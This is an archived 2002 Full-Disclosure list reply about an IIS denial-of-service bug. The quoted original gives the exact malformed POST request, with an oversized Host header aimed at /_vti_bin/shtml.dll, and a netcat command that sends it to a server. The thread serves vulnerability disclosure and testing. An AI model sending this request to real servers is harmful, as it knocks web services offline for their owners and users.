Re: [Full-Disclosure] How to reproduce the IIS Host Header DOS

From: Full Disclosure (full-disclosureat_private)
Date: Sat Oct 12 2002 - 12:55:51 PDT

Next message: Matthew Murphy: "[VulnWatch] PHP Information Functions May Allow Cross-Site Scripting"

Previous message: Rapid 7 Security Advisories: "R7-0006: Oracle 8i/9i Listener SERVICE_CURLOAD Denial of Service"
In reply to: Joe Testa: "[Full-Disclosure] How to reproduce the IIS Host Header DOS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Heh. I thought my screenshot DID show exactly how to reproduce the bug:
You run SPIKE! :> You can download SPIKE 2.7 at
http://www.immunitysec.com/spike.html - it's the exact version I used in
the demonstration screenshot.

You should read my actual commentary on the bug. The bug is actually IIS
servicing a stack overflow exception, and is not limited to
/_vti_bin/shtml.dll or any other particular file or directory. It also
affects IIS 5.1. It's not limited to the Host: field, as far as I can
tell. Any "stack overflow" exception will trigger this behavior.

Dave Aitel
Immunity, Inc.

On Fri, 2002-10-11 at 19:26, Joe Testa wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> 
> 
> - From the screenshots and descriptions given in
> <http://online.securityfocus.com/bid/5907>, it's not clear *exactly* how to
> reproduce the IIS Host header DoS.
> 
> A POST request like the following (between the [begin] and [end] lines)
> will
> manually reproduce the IIS DoS condition:
> 
> 
> - -------------------------[begin]--------------------------------------
> POST /_vti_bin/shtml.dll HTTP/1.0
> Host: [32762 '/' characters]
> Content-length:      22
> 
> 
> http://www.rapid7.com/
> - --------------------------[end]---------------------------------------
> 
> 
> This will cause the web service to consume 99% of the CPU for about 35
> seconds.  During this time, no other HTTP requests will be serviced.
> Attached
> to this email is the complete string to facilitate testing.  Use it with:
> 
> $ nc x.x.x.x 80 < iis_dos
> 
> 
>    - Joe Testa, Rapid 7, Inc.
>    http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839
>    A145 B158 2CA7 00A2 BAE8  4A18 57E5 18E0 02B0 0839
> 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.7 (Cygwin32)
> 
> iD8DBQE9p1w3V+UY4AKwCDkRAjHQAJ0Vx5c1rJvDY5+n2595Wq6NQbqwOACeNBBO
> GcA6qrjAE1Tj+Jqx3kE9U4Q=
> =RkVz
> -----END PGP SIGNATURE-----
> 
> (See attached file: iis_dos)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Matthew Murphy: "[VulnWatch] PHP Information Functions May Allow Cross-Site Scripting"
Previous message: Rapid 7 Security Advisories: "R7-0006: Oracle 8i/9i Listener SERVICE_CURLOAD Denial of Service"
In reply to: Joe Testa: "[Full-Disclosure] How to reproduce the IIS Host Header DOS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Oct 13 2002 - 02:28:03 PDT